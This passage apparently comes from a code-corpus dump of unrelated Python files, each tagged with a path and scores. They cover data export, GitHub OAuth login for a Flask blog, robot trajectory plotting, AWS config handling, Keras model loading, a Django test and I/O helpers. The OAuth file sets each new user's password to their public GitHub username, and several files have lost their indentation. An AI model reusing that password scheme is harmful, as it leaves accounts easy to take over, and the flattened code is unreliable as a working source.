) | tardis/utilities/executors/sshexecutor.py | 0.558327 | 0.098079 |
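The ssh_connection property above is an async double-checked initialization: a cheap unlocked check, then the lock, then a re-check so that only one coroutine ever opens the connection under concurrent first use. A stripped-down sketch of just that pattern, with a sleep standing in for asyncssh.connect:

import asyncio

class LazyConnection:
    def __init__(self):
        self._conn = None
        self._lock = asyncio.Lock()

    async def _connect(self):
        await asyncio.sleep(0.1)  # stands in for asyncssh.connect(...)
        return object()

    async def get(self):
        if self._conn is None:              # fast path, no lock taken
            async with self._lock:
                if self._conn is None:      # re-check under the lock
                    self._conn = await self._connect()
        return self._conn

async def main():
    lazy = LazyConnection()
    a, b = await asyncio.gather(lazy.get(), lazy.get())
    print(a is b)  # True: concurrent callers share one connection

asyncio.run(main())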
import csv
import pandas as pd
from src.filepaths import getFilePathOutput
def exportInputData(params: dict):
rows = []
for paramKey, paramData in params.items():
source = paramData['source'] if 'source' in paramData else ''
rows.extend(__printScenarioValue(paramData['desc'], paramData['unit'], source, paramData['value']))
__writeToFile(rows, 'table_scenario_params.csv')
def __printScenarioValue(name, unit, source, value):
    # Dicts with string keys are sub-parameters: recurse and flatten them into rows.
    if isinstance(value, dict) and isinstance(list(value.keys())[0], str):
        r = []
        for key, val in value.items():
            r.extend(__printScenarioValue(f"{name} {key}", unit, source, val))
        return r
    # Dicts with non-string (year) keys: report the first and the last entry.
    elif isinstance(value, dict):
        return [(name, unit, '{0}: {1}'.format(*list(value.items())[0]), '{0}: {1}'.format(*list(value.items())[-1]), source)]
    # Scalars are assumed constant over the whole 2025-2050 horizon.
    else:
        return [(name, unit, f"2025: {value}", f"2050: {value}", source)]
def exportFullParams(full_params: pd.DataFrame):
yearInit = 2025
yearFinal = 2050
fullParamsInit = full_params.query(f"year == {yearInit}").drop(columns=['year'])
fullParamsFinal = full_params.query(f"year == {yearFinal}").drop(columns=['year'])
fullParamInitFinal = fullParamsInit.merge(fullParamsFinal, on=['name', 'unit'], how='outer', suffixes=('_init', '_final'))
params = []
for index, row in fullParamInitFinal.iterrows():
vi = __printValueFull(row['value_init'], row['uncertainty_init'], row['uncertainty_lower_init'])
vf = __printValueFull(row['value_final'], row['uncertainty_final'], row['uncertainty_lower_final'])
params.append((row['name'], row['unit'], vi, vf))
__writeToFile(params, 'table_full_params.csv')
def __printValueFull(val, uu, ul):
if uu is None:
return f"{val}\t"
elif ul is None:
return f"{val} +- {uu}\t"
else:
return f"{val} + {uu} - {ul}\t"
def __writeToFile(params: list, fname: str):
filePath = getFilePathOutput(fname)
with open(filePath, 'w') as csvFile:
spamwriter = csv.writer(csvFile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
spamwriter.writerows(params) | src/data/params/export_params.py | 0.326271 | 0.229827 |
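As a quick trace of the recursive flattening in __printScenarioValue: string-keyed dicts recurse into sub-parameters, while year-keyed dicts become first/last columns. The sample dict below is illustrative and assumes the function above is in scope:

sample = {
    "desc": "Capture cost",
    "unit": "EUR/t",
    "source": "assumed source",
    "value": {"low": {2025: 40, 2050: 20}, "high": {2025: 60, 2050: 35}},
}
for row in __printScenarioValue(sample["desc"], sample["unit"], sample["source"], sample["value"]):
    print(row)
# ('Capture cost low', 'EUR/t', '2025: 40', '2050: 20', 'assumed source')
# ('Capture cost high', 'EUR/t', '2025: 60', '2050: 35', 'assumed source')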
import os
import time
from datetime import datetime
import requests
from flask import Blueprint, jsonify, json, current_app
from flask_login import current_user, login_user
from jaysblog import User, db
from jaysblog.utils.response_code import RET
oauth_bp = Blueprint('oauth_blueprint', __name__)
# GitHub OAuth endpoints and credentials (plain values, not one-element tuples).
name = 'github'
consumer_key = os.getenv('GITHUB_CLIENT_ID')
consumer_secret = os.getenv('GITHUB_CLIENT_SECRET')
request_token_params = {'scope': 'user'}
base_url = 'https://api.github.com/'
request_token_url = None
access_token_method = 'POST'
access_token_url = 'https://github.com/login/oauth/access_token'
authorize_url = 'https://github.com/login/oauth/authorize'
user_url = 'https://api.github.com/user'
@oauth_bp.route('/login/<code>')
def oauth_login(code):
if code is None:
return jsonify(code=RET.PARAMS_MISSING_ERROR, msg='Missing or invalid parameters')
if current_user.is_authenticated:
if current_user.is_admin is True:
currentAuthority = 'admin'
else:
currentAuthority = 'user'
return jsonify(code=RET.OK, msg='Current user is already authenticated', currentAuthority=currentAuthority, type='account',
               user_id=current_user.id)
return oauth_callback(code)
def oauth_callback(code):
if code is None:
return jsonify(code=RET.PARAMS_MISSING_ERROR, msg='Missing or invalid parameters')
data = {
'client_id': consumer_key,
'client_secret': consumer_secret,
'code': code,
}
access_token_params = requests.post(url=access_token_url, data=data)
if access_token_params.status_code == 200:
    text = access_token_params.text
    if 'access_token' in text and 'scope' in text:
        args = text.split('&')[0]
        access_token = args.split('=')[1]
        return get_oauth_user_messages(access_token)
    else:
        return jsonify(code=RET.USER_OAUTH_ERROR, msg='Third-party authorization expired, please try again later')
else:
    return jsonify(code=RET.USER_OAUTH_ERROR, msg='Failed to fetch third-party authorization, please try again later')
def get_oauth_user_messages(access_token):
if access_token is None:
return jsonify(code=RET.PARAMS_MISSING_ERROR, msg='Missing or invalid parameters')
params = {
'access_token': access_token
}
user_messages = requests.get(user_url, params)
user_text = user_messages.text
user_json = json.loads(user_text)
try:
user = User.query.filter(User.id == user_json['id']).first()
except Exception as e:
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_SELECT_ERROR, msg='Failed to query the database')
if user:
login_user(user, remember=True)
if user.nick_name != user_json['login']:
user.nick_name = user_json['login']
user.email = user_json['email'] if user_json['email'] else user_json['html_url']
user.last_login_time = datetime.utcnow()
try:
db.session.commit()
except Exception as e:
db.session.rollback()
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_COMMIT_ERROR, msg='Failed to commit user data to the database')
else:
user = User()
try:
user_check = User.query.filter_by(nick_name=user_json['login']).first()
except Exception as e:
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_SELECT_ERROR, msg='Failed to query the database')
if user_check:
    # Append a timestamp fragment so the new nick_name does not collide.
    user.nick_name = user_json['login'] + str(time.time()).split('.')[1]
else:
    user.nick_name = user_json['login']
user.id = user_json['id']
user.email = user_json['email'] if user_json['email'] else user_json['html_url']
user.avatar_url = user_json['avatar_url']
user.password = user_json['login']
user.desc = user_json['bio']
user.location = user_json['location']
user.last_login_time = datetime.utcnow()
try:
db.session.add(user)
db.session.commit()
login_user(user, remember=True)
except Exception as e:
db.session.rollback()
current_app.logger.error(e)
return jsonify(code=RET.DATABASE_COMMIT_ERROR, msg='Failed to commit user data to the database')
return jsonify(code=RET.OK, msg='Third-party authorization login successful') | jaysblog/blueprints/oauth/oauth_blueprint.py | 0.172137 | 0.053725 |
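Splitting the token response on '&' and '=' works but is brittle; the body GitHub returns is ordinary form encoding, which the standard library can parse. A hedged sketch of just the parsing step (the sample body mimics GitHub's documented response format):

from urllib.parse import parse_qs

def extract_access_token(body):
    # body looks like "access_token=gho_xxx&scope=user&token_type=bearer"
    fields = parse_qs(body)
    tokens = fields.get("access_token")
    return tokens[0] if tokens else None

print(extract_access_token("access_token=gho_xxx&scope=user&token_type=bearer"))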
from environments import SerialTwoDOFGym
from visualservoing.state_extractory import StateExtractor
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import torch
import glob
#HELPER FUNCTION
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
def check_pos_definite(A):
eigs = np.linalg.eigvals(A)
return (eigs > 0).all()
#GET DATA
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
visualize = "2-dof-inversejacobian"
#visualize="blackbox-kinematics-custom"
#visualize="global-neuralnetwork-multitask-custom"
directories = glob.glob('.experiments/kinova-2d-planar_analysis_take2/{}/*/result*.pth'.format(visualize))
#load each
results = {}
seed = 0
is_one_model = False
for pth in directories:
dt = pth.split('/')[-1].split('-dt-')[-1].split('-')[0]
algorithm = pth.split('/')[2] #+ '-' + dt
result = torch.load(pth)
if algorithm in results and not is_one_model:
start = len(results[algorithm])
end = len(results[algorithm]) + len(result)
j = 0
for i in range(start, end):
results[algorithm][i] = result[j]
j += 1
elif algorithm in results and is_one_model:
results[algorithm + "-" + str(seed)] = result
seed += 1
else:
results[algorithm] = result
result = results[visualize]
#LOOK AT TRAJECTORIES AND POSES IN ENVIRONMENT
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
num_pts = 1
pts_dim = 2
num_actuators = 2
state_extractor = StateExtractor(num_points=num_pts, point_dim=pts_dim, num_angles=num_actuators)
dt = 0.05
L1 = 0.3143
L2 = 0.1674 + 0.120
Z_OFFSET = 0.7052
gym = SerialTwoDOFGym(L1= L1, L2= L2)
def transform_coords(vec):
    # Converts (x, y, z) ==> (x, y) plane, treating new_x = z, new_y = x
    new_x = vec[2] - Z_OFFSET
    new_y = vec[0]
    return np.array([new_x, new_y])
for k in result.keys():
trajectory = result[k]
print("Trajectory: {} length {}".format(k, len(trajectory)))
steps = 0
psn, trg = state_extractor.get_position_and_target(trajectory[0][5])
if np.linalg.norm(trg - psn, 2) < 1.0 and np.linalg.norm(trg - psn, 2) >= 0.75:
for v in trajectory:
steps += 1
state = v[0]
ths = state_extractor.get_angles(state)
psn, trg = state_extractor.get_position_and_target(state)
#trg = transform_coords(trg)
gym.target = trg
gym.th1 = ths[0]
gym.th2 = ths[1]
gym.update_psn()
gym.render() | src/viz_robot_traj.py | 0.301465 | 0.520009 |
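Rendering a pose from the two joint angles is plain planar forward kinematics: the elbow sits at distance L1 along th1, and the tip adds L2 along th1 + th2. A sketch of what gym.update_psn presumably computes, reusing the link lengths defined above (the gym's internals are not shown in this file):

import numpy as np

def forward_kinematics(th1, th2, L1=0.3143, L2=0.1674 + 0.120):
    # Elbow at L1 along th1; end effector adds L2 along the summed angle.
    elbow = np.array([L1 * np.cos(th1), L1 * np.sin(th1)])
    tip = elbow + np.array([L2 * np.cos(th1 + th2), L2 * np.sin(th1 + th2)])
    return elbow, tip

elbow, tip = forward_kinematics(np.pi / 4, -np.pi / 6)
print(elbow, tip)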
import lambda_toolkit.modules.logger as logger
from lambda_toolkit.modules.utils import Utils
import os
import json
import pkgutil
import boto3
from shutil import copytree
class Conf:
def __init__(self):
self.config_file = os.path.join(os.path.expanduser('~'), ".lambda-toolkit.json")
self.log = logger.get_my_logger("lambda-toolkit")
# Get default configuration
default_conf = json.loads(pkgutil.get_data("lambda_toolkit", "data/lambda-toolkit.json"))
self.cli = default_conf['cli']
self.aws_regions = default_conf['aws-regions']
# Keep compatibility with previous versions
self.sett = self._sync_settings(default_conf)
self._copy_default_folder()
self._set_authmode_and_default_region()
def set_region(self, region):
self.region = region
if 'configurations' not in self.json_conf:
self.json_conf['configurations'] = {}
if self.region not in self.json_conf['configurations']:
self.json_conf['configurations'][self.region] = {}
confs = list(self.cli)
# "proxy" pluralizes irregularly: swap in the stem "proxie" so the "s" appended below yields "proxies"
confs.remove("proxy")
confs.append("proxie")
for c in confs:
c = c + "s"
if c not in self.json_conf['configurations'][self.region]:
self.json_conf['configurations'][self.region][c] = {}
setattr(self, c, self.json_conf['configurations'][self.region][c])
return self
def save_config(self):
with open(self.config_file, "w") as f:
f.write(json.dumps(self.json_conf, indent=4))
def get_boto3(self, api_name, api_method):
func = getattr(__import__("boto3"), api_method)
if self.auth_mode == "env":
return func(
api_name,
aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],
aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],
region_name=self.region
)
else:
return func(api_name, region_name=self.region)
def _set_authmode_and_default_region(self):
self.auth_mode = "env"
for env_var in ['AWS_REGION', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY']:
if env_var not in os.environ:
self.auth_mode = "file"
s = boto3.session.Session().region_name
if s is None:
self.log.critical("Cannot read 'region' from env or credential file")
self.set_region(boto3.session.Session().region_name)
break
if self.auth_mode == "env":
self.set_region(os.environ['AWS_REGION'])
def _copy_default_folder(self):
    if not os.path.exists(Utils.fixpath(self.sett['C_BASE_DIR'])):
        path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
        copytree(os.path.join(path, Utils.fixpath(self.sett['C_STANDARD_FOLDER_DIR'])),
                 Utils.fixpath(self.sett['C_BASE_DIR']))
def _sync_settings(self, default_conf):
if os.path.isfile(self.config_file):
with open(self.config_file, "r") as f:
self.json_conf = json.loads(f.read())
# Check for new settings (Make compatible with older versions)
for setting in default_conf['settings']:
if setting not in self.json_conf['settings']:
self.log.debug("Adding new setting: " + setting)
self.json_conf['settings'][setting] = default_conf['settings'][setting]
# Remove deprecated settings
remove_list = []
for setting in self.json_conf['settings']:
if setting not in default_conf['settings']:
self.log.debug("Removing old setting: " + setting)
remove_list.append(setting)
for r in remove_list:
self.json_conf['settings'].pop(r)
else:
self.json_conf = {}
self.json_conf['settings'] = default_conf['settings']
return self.json_conf['settings'] | lambda_toolkit/modules/conf.py | 0.196209 | 0.046335 |
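The _sync_settings migration is a two-way dict reconciliation: defaults that are missing get added, keys the tool no longer recognizes get dropped, and user-customized values survive. A standalone sketch of that merge (names illustrative):

def sync_settings(current, defaults):
    # Add settings introduced since the config file was written.
    for key, value in defaults.items():
        current.setdefault(key, value)
    # Drop settings that the tool no longer recognizes.
    for key in [k for k in current if k not in defaults]:
        current.pop(key)
    return current

print(sync_settings({"old": 1, "kept": 2}, {"kept": 0, "new": 3}))
# {'kept': 2, 'new': 3}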
from keras.models import load_model
from keras.models import model_from_json
# internal package
from src.infra import infra
# Initialize Global alias
_appendListElement = infra._appendListElement
_getSplitedStringByIndex = infra._getSplitedStringByIndex
_getElementByIndex = infra._getElementByIndex
_getFilesFromFolder = infra._getFilesFromFolder
_getFilePathAndName = infra._getFilePathAndName
_openImageFile = infra._openImageFile
_imageToNumpyArray = infra._imageToNumpyArray
_renderRGBImage = infra._renderRGBImage
_renderRGBtoGrayImage = infra._renderRGBtoGrayImage
_resizeImageByModelInputShape = infra._resizeImageByModelInputShape
_normalizeImage = infra._normalizeImage
_reshapeGrayImage = infra._reshapeGrayImage
_expandRGBImageDimensions = infra._expandRGBImageDimensions
def _buildDictModel(list_model) -> list:
"""
_buildDictModel() : Provide a collection of model name and collection of model path
This function will help to build Model dictionary by providing each key and value
This function will handle both of json model or h5 model
ACCEPT list of model either json or h5 model as argument
RETURN keys, values
RETURN EXAMPLE :
* KEYS : ['BALANCE_model', 'IMBALANCE_model', 'SPLIT_AUGMENTATION_model']
* VALUES : ['static/model/BALANCE_model.h5', 'static/model/IMBALANCE_model.h5',
'static/model/SPLIT_AUGMENTATION_model.h5']
"""
keys = []
values = []
for model in list_model:
if type(model) == list: # handle json model (include json model and h5 weight)
getModelPath = _getElementByIndex(model, 0)
get_model_and_ext = _getSplitedStringByIndex(getModelPath, "/", -1)
get_model_name = _getSplitedStringByIndex(get_model_and_ext, ".", 0)
_appendListElement(keys, get_model_name)
_appendListElement(values, model)
else: # handle hdf5 or H5 model
get_model_and_ext = _getSplitedStringByIndex(model, "/", -1)
get_model_name = _getSplitedStringByIndex(get_model_and_ext, ".", 0)
_appendListElement(keys, get_model_name)
_appendListElement(values, model)
return keys, values
def _buildListModel(path):
"""
_buildListModel() : Provide a collection of model and weight path
This function will help to build Model dictionary by providing a collection model and weight path
    either json model or hdf5 model. It scans all models by pattern name, such as (model.json,
    weights.h5, weights.hdf5, model.h5, and model.hdf5).
ACCEPT path of model directory as argument
RETURN json_model and hdf5_model which is containing each model path
RETURN EXAMPLE :
* JSON_MODEL : [ ['static/model/BALANCE_model.json', 'static/model/BALANCE_weight.h5'],
['static/model/SPLIT_AUGMENTATION_model.json', 'static/model/SPLIT_AUGMENTATION_weight.h5'],
]
* HDF5_MODEL : ['static/model/BALANCE_model.h5', 'static/model/SPLIT_AUGMENTATION_model.h5']
"""
json_arch = []
json_weight = []
hdf5_model = []
json_model = []
files_in_folder = _getFilesFromFolder(path) # scan all model in path directory
for data in files_in_folder: # iterate files_in_folder to extract model and weight information
    if "model.json" in data: # get json model by pattern name <model.json>
        file_name_and_path = _getFilePathAndName(path, data)
        _appendListElement(json_arch, file_name_and_path)
    elif "weights.h5" in data or "weights.hdf5" in data: # get model weight by pattern name <weights.h5 or weights.hdf5>
        file_name_and_path = _getFilePathAndName(path, data)
        _appendListElement(json_weight, file_name_and_path)
    elif "model.h5" in data or "model.hdf5" in data: # get model by pattern name <model.h5 or model.hdf5>
        file_name_and_path = _getFilePathAndName(path, data)
        _appendListElement(hdf5_model, file_name_and_path)
if json_arch and json_weight: # build the json model collection (a list of json models paired with their related weights)
    json_model = _getJsonModel(json_arch, json_weight)
return json_model, hdf5_model
def _getDictModel(path):
"""
    _getDictModel() : Provide a dictionary of models and weights (json or h5), with model names as keys and model paths as values.
    This function generates model information for the service and application layers.
    It uses _buildListModel and _buildDictModel as helpers; for details, please see the documentation of each function.
ACCEPT path of model directory as argument
RETURN dicts, keys and values which is containing model information such path and model name.
RETURN EXAMPLE :
* DICTS : {
'BALANCE_model': 'static/model/BALANCE_model.h5',
'IMBALANCE_model': 'static/model/IMBALANCE_model.h5',
'SPLIT_AUGMENTATION_model': 'static/model/SPLIT_AUGMENTATION_model.h5'
}
* KEYS : ['BALANCE_model', 'IMBALANCE_model', 'SPLIT_AUGMENTATION_model']
* VALUES: ['static/model/BALANCE_model.h5',
'static/model/IMBALANCE_model.h5',
'static/model/SPLIT_AUGMENTATION_model.h5']
"""
dicts = {}
keys = []
values = []
json_model, hdf5_model = _buildListModel(path)
if json_model:
keys, values = _buildDictModel(json_model)
if hdf5_model:
keys, values = _buildDictModel(hdf5_model)
for i in range(len(keys)):
data = _getElementByIndex(keys, i)
dicts[data] = values[i]
return dicts, keys, values
def _loadSelectModel(model, path):
"""
    _loadSelectModel() : Load the selected model (json or h5) into a keras Sequential model.
ACCEPT selected model and path of model directory as argument
RETURN keras sequential model <keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>
RETURN EXAMPLE :
* LOADED_MODEL : <keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>
"""
model_dict, _, _ = _getDictModel(path)
loaded_model = None  # stays None when the requested model name is not found
for data in model_dict:
    if data == model:
        model_and_weight = _getElementByIndex(model_dict, data)
if type(model_and_weight) == list and model_and_weight: # handle json model and weight
model_name = _getElementByIndex(model_and_weight, 0) # get json model name
weight_name = _getElementByIndex(model_and_weight, 1) # get model weight
json_file = open(model_name, 'r') # open json model
loaded_model_json = json_file.read() # read json model
json_file.close()
loaded_model = model_from_json(loaded_model_json) # load json model
loaded_model.load_weights(weight_name) # load weight
else: # handle h5 or hdf5 model
loaded_model = load_model(model_and_weight)
return loaded_model
def _loadCompareModel(list_model, path):
"""
    _loadCompareModel() : Load all of the selected models (json or h5) into keras Sequential models.
    This function provides a collection of keras Sequential models that can be used by the service layer.
ACCEPT selected list_model and path of model directory as argument
RETURN a collection of keras sequential model [<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,
<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,]
RETURN EXAMPLE :
* LIST_OFMODEL : [<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,
<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,]
"""
model_dict, _, _ = _getDictModel(path)
list_ofModel = []
for data in list_model:
model_and_weight = _getElementByIndex(model_dict, data)
if data in model_dict:
if type(model_and_weight) == list and model_and_weight: # handle json model and weight
model_name = _getElementByIndex(model_and_weight, 0) # get json model name
weight_name = _getElementByIndex(model_and_weight, 1) # get model weight
json_file = open(model_name, 'r') # open json model
loaded_model_json = json_file.read() # read json model
json_file.close()
loaded_model = model_from_json(loaded_model_json) # load json model
loaded_model.load_weights(weight_name) # load weight
_appendListElement(list_ofModel, loaded_model) # append loaded model with weight into list_OfModel
else: # handle h5 or hdf5 model
loaded_model = load_model(model_and_weight) # load h5 or hdf5 model
_appendListElement(list_ofModel, loaded_model) # append model into list_OfModel
return list_ofModel
def _getJsonModel(models, weights) -> list:
    """
    _getJsonModel() : Provide a collection of json models, each paired with its weight. It is helpful for
    building a collection of json models that can later be loaded.
    ACCEPT json models and the weights of each json model as arguments
    RETURN a collection of [model, weight] pairs
    RETURN EXAMPLE :
    * JSON_MODEL : [['static/model/BALANCE_model.json', 'static/model/BALANCE_weight.h5'],
    ['static/model/SPLIT_AUGMENTATION_model.json', 'static/model/SPLIT_AUGMENTATION_weight.h5']]
    """
sub_value = []
json_model = []
    models.sort(reverse=True)  # sort models descending so pop() returns them in ascending order
    weights.sort()  # sort weights ascending to align with the popped models
for weight in weights:
model = models.pop() # get model name and pop it up
get_model_and_ext = _getSplitedStringByIndex(model, "/", -1) # example result: VGG19_model.json
model_name = _getSplitedStringByIndex(get_model_and_ext, "_", 0) # example result: VGG19
        if model_name in weight:  # check whether the model name occurs in the weight path (match by name prefix)
_appendListElement(sub_value, model)
_appendListElement(sub_value, weight)
_appendListElement(json_model, sub_value)
sub_value = []
return json_model
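# Illustrative walk-through (added; file names are hypothetical): given
# models = ['static/model/VGG19_model.json'] and
# weights = ['static/model/VGG19_weights.h5'], the "VGG19" prefix taken from
# the architecture file name matches the weight path, so the result is
# [['static/model/VGG19_model.json', 'static/model/VGG19_weights.h5']].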
def _rgbImageProcessing(image_file, keras_model):
"""
    _rgbImageProcessing() : Provide RGB image preprocessing for a raw query image, based on the model's input shape
ACCEPT raw image file and keras sequential model as argument
RETURN a numpy array of image which is ready to use for prediction
RETURN EXAMPLE :
* RESULTIMAGE : [[[[0.00784314 0.00784314 0.00784314]
[0.00784314 0.00784314 0.00784314]
[0.00784314 0.00784314 0.00784314]
...
[0.00392157 0.00392157 0.00392157]
[0.00392157 0.00392157 0.00392157]
[0.00392157 0.00392157 0.00392157]]
...
[[0.02352941 0.02352941 0.02352941]
[0.03529412 0.03529412 0.03529412]
[0.03137255 0.03137255 0.03137255]
...
[0.02745098 0.02745098 0.02745098]
[0.02352941 0.02352941 0.02352941]
[0.01960784 0.01960784 0.01960784]]]]
"""
readImage = _openImageFile(image_file) # open image file
imageNdarray = _imageToNumpyArray(readImage) # transform image into numpy array
convertToRGB = _renderRGBImage(imageNdarray) # change image type from BGR to RGB
    resizeImage, _, _ = _resizeImageByModelInputShape(convertToRGB, keras_model)  # resize image based on model input shape
normalizeImage = _normalizeImage(resizeImage) # normalize image
    resultImage = _expandRGBImageDimensions(normalizeImage, 0)  # add a batch dimension for prediction
return resultImage
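# Usage sketch (added; names are illustrative):
#
#   model = _loadSelectModel("BALANCE_model", "static/model")
#   batch = _rgbImageProcessing("query.jpg", model)  # shape (1, height, width, 3)
#   scores = model.predict(batch)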
def _grayImageProcessing(image_file, model):
"""
    _grayImageProcessing() : Provide grayscale image preprocessing for a raw query image, based on the model's input shape
ACCEPT raw image file and keras sequential model as argument
RETURN a numpy array of image which is ready to use for prediction
RETURN EXAMPLE :
* RESULTIMAGE : [[[0.00784314]
[0.00784314]
[0.00784314]
...
[0.00392157]
[0.00392157]
[0.00392157]]
...
[[0.02352941]
[0.03529412]
[0.03137255]
...
[0.02745098]
[0.02352941]
[0.01960784]]]
"""
readImage = _openImageFile(image_file) # open image file
imageNdarray = _imageToNumpyArray(readImage) # transform image into numpy array
convertToRGB = _renderRGBImage(imageNdarray) # change image type from BGR to RGB
convertToGray = _renderRGBtoGrayImage(convertToRGB) # change image type from RGB into Grayscale
    resizeImage, _, image_size = _resizeImageByModelInputShape(convertToGray, model)  # resize image based on model input shape
normalizeImage = _normalizeImage(resizeImage) # normalize image
    resultImage = _reshapeGrayImage(normalizeImage, image_size)  # reshape the grayscale image for prediction
return resultImage | refactoring_project/src/config/config.py | 0.665845 | 0.221298
from mock import patch
from django.test import TestCase
from ..serializer import CollaboratorSerializer
class CollaboratorSerializerTests(TestCase):
"""Test RepoSerializer methods"""
def setUp(self):
self.username = "delete_me_username"
self.repo_base = "delete_me_repo_base"
self.password = "<PASSWORD>"
self.mock_manager = self.create_patch(
'api.serializer.DataHubManager')
self.mock_reverse = self.create_patch(
'api.serializer.reverse')
self.mock_reverse.return_value = ('mock_url')
self.serializer = CollaboratorSerializer(
username=self.username, repo_base=self.repo_base)
def create_patch(self, name):
# helper method for creating patches
patcher = patch(name)
thing = patcher.start()
self.addCleanup(patcher.stop)
return thing
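# Note (added): because each patcher's stop is registered with addCleanup,
# every patch started here is undone automatically when the test finishes,
# with no decorator stacking or explicit tearDown required.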
def test_list_collaborators(self):
list_collab_result = [
{'username': 'collab1', 'privileges': 'UC'},
{'username': 'collab2', 'privileges': 'U'}]
mock_list_collabs = self.mock_manager.return_value.list_collaborators
mock_list_collabs.return_value = list_collab_result
expected_result = {'collaborators': [
{'username': 'collab1', 'href': 'mock_url'},
{'username': 'collab2', 'href': 'mock_url'}]}
res = self.serializer.list_collaborators('repo_name')
self.assertEqual(expected_result, res)
def test_add_collaborator(self):
mock_add_collab = self.mock_manager.return_value.add_collaborator
mock_add_collab.return_value = True
res = self.serializer.add_collaborator('repo_name', 'collab', [], [])
self.assertTrue(mock_add_collab.called)
self.assertEqual(True, res)
def test_remove_collaborator(self):
mock_remove_collab = self.mock_manager.return_value.delete_collaborator
mock_remove_collab.return_value = True
res = self.serializer.remove_collaborator('repo_name', 'collab')
self.assertTrue(mock_remove_collab.called)
self.assertEqual(True, res) | src/api/test/test_collaborator_serializer.py | 0.584034 | 0.183502
import os.path
import time
import sys
import logging
import pickle
import urllib.request
from io import StringIO
from pathlib import Path
import yaml
import numpy as np
# Params
def load_params(path):
"""Return loaded parameters from a yaml file"""
with open(path, "r") as handle:
content = yaml.safe_load(handle)
if "__template__" in content:
# Treat template as defaults
template_path = os.path.expanduser(content.pop("__template__"))
template = load_params(os.path.join(os.path.dirname(path), template_path))
content = dict_deep_overlay(template, content)
return content
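# Illustrative example (added; file names are hypothetical): if params.yml contains
#   __template__: defaults.yml
#   train: {lr: 0.01}
# then load_params("params.yml") first loads defaults.yml (resolved relative to
# params.yml) and deep-overlays the remaining keys on top of those defaults.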
def dict_deep_overlay(defaults, params):
"""If defaults and params are both dictionaries, perform deep overlay (use params value for
keys defined in params, otherwise use defaults value)"""
if isinstance(defaults, dict) and isinstance(params, dict):
for key in params:
defaults[key] = dict_deep_overlay(defaults.get(key, None), params[key])
return defaults
return params
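# Example (added):
# dict_deep_overlay({"a": {"x": 1, "y": 2}}, {"a": {"y": 3}})
# returns {"a": {"x": 1, "y": 3}} -- nested dicts are merged key by key,
# while non-dict values from params simply replace the defaults.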
# Logging
def init_logger(log_path):
"""Return a logger instance which logs to stdout and, if log_path is not None, also to a file"""
logger = logging.getLogger("ASMK")
logger.setLevel(logging.DEBUG)
stdout_handler = logging.StreamHandler()
stdout_handler.setLevel(logging.INFO)
stdout_handler.setFormatter(logging.Formatter('%(name)s %(levelname)s: %(message)s'))
logger.addHandler(stdout_handler)
if log_path:
file_handler = logging.FileHandler(log_path)
file_handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s: %(message)s')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
def progress(iterable, *, size=None, frequency=1, header=""):
"""Generator that wraps an iterable and prints progress"""
if size is None:
size = len(iterable)
header = f"{header.capitalize()}: " if header else ""
charsize = len(str(size))
if frequency:
print(f"{header}[{'0'.rjust(charsize)}/{size}]", end=" ")
sys.stdout.flush()
time0 = time.time()
for i, element in enumerate(iterable):
yield element
i1 = i+1
if frequency and (i1 % frequency == 0 or i1 == size):
avg_time = (time.time() - time0) / i1
print(f"\r{header}[{str(i1).rjust(charsize)}/{size}] " \
f"elapsed {int(avg_time*i1/60):02d}m/{int(avg_time*size/60):02d}m", end=" ")
sys.stdout.flush()
if frequency:
print()
def capture_stdout(func, logger):
"""Redirect stdout to logger"""
sys.stdout, stdout = StringIO(), sys.stdout
    try:
        func()
    finally:
        # restore stdout even if func raises, then collect the captured text
        sys.stdout, out_text = stdout, sys.stdout.getvalue()
for line in out_text.strip().split("\n"):
logger.info(line)
# Load and save state dicts
def load_pickle(path):
"""Load pickled data from path"""
with open(path, 'rb') as handle:
return pickle.load(handle)
def save_pickle(path, data):
"""Save data to path using pickle"""
with open(path, 'wb') as handle:
pickle.dump(data, handle)
# Download
def download_files(names, root_path, base_url, logfunc=None):
"""Download file names from given url to given directory path. If logfunc given, use it to log
status."""
root_path = Path(root_path)
for name in names:
path = root_path / name
if path.exists():
continue
if logfunc:
logfunc(f"Downloading file '{name}'")
path.parent.mkdir(parents=True, exist_ok=True)
urllib.request.urlretrieve(base_url + name, path)
# Iteration
def slice_unique(ids):
"""Generate slices that mark a sequence of identical values in a given array of ids. The
sequence must be uninterrupted (compact)."""
pointer = 0
for i, counts in zip(*np.unique(ids, return_counts=True)):
seq = slice(pointer, pointer+counts)
assert (ids[seq] == i).all()
yield i, seq
pointer += counts | asmk/io_helpers.py | 0.478041 | 0.1585
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['KeyArgs', 'Key']
@pulumi.input_type
class KeyArgs:
def __init__(__self__, *,
domain: pulumi.Input[str]):
"""
The set of arguments for constructing a Key resource.
:param pulumi.Input[str] domain: Domain name
"""
pulumi.set(__self__, "domain", domain)
@property
@pulumi.getter
def domain(self) -> pulumi.Input[str]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: pulumi.Input[str]):
pulumi.set(self, "domain", value)
@pulumi.input_type
class _KeyState:
def __init__(__self__, *,
algorithm: Optional[pulumi.Input[int]] = None,
algorithm_name: Optional[pulumi.Input[str]] = None,
deleted: Optional[pulumi.Input[bool]] = None,
